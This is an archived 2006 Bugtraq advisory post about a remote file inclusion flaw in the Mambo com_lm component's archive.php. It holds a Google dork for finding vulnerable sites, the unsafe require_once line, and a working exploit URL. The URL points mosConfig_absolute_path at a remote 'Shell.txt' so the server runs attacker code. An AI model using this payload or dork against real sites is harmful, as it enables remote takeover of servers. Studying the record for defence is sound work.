| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 16 Aug 2006 09:36:11 -0000 From: crackers_child@...ersavascilar.com To: bugtraq@...urityfocus.com Subject: Mambo com_lm component (archive.php) Remote File Include Vulnerabilities !!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!! -------------------------------------------------------------------------------- Title : Mambo com_lm component (archive.php) Remote File Include Vulnerabilities -------------------------------------------------------------------------------- #Author: Crackers_Child #cont@ct: crackers_child@...ersavascilar.com -------------------------------------------------------------------------------- Google Dorks : inurl:"/com_lm/" ------------------------- ------------------------------------------------------- Application : com_lm Component of Mambo -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- Bug in archive.php -- // Change the $LM_PATH variable in the eu_config.inc.php file in this directory. require_once($GLOBALS['mosConfig_absolute_path']."/components/com_lm/public_config.inc.php"); -- -------------------------------------------------------------------------------- Exploit: http://[target]/[mambo_path]/components/com_lm/archive.php?mosConfig_absolute_path=Shell.txt? -------------------------------------------------------------------------------- greets: X_ALPEREN_X,Root_MOr And All Other Friends -------------------------------------------------------------------------------- --------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
Powered by blists - more mailing lists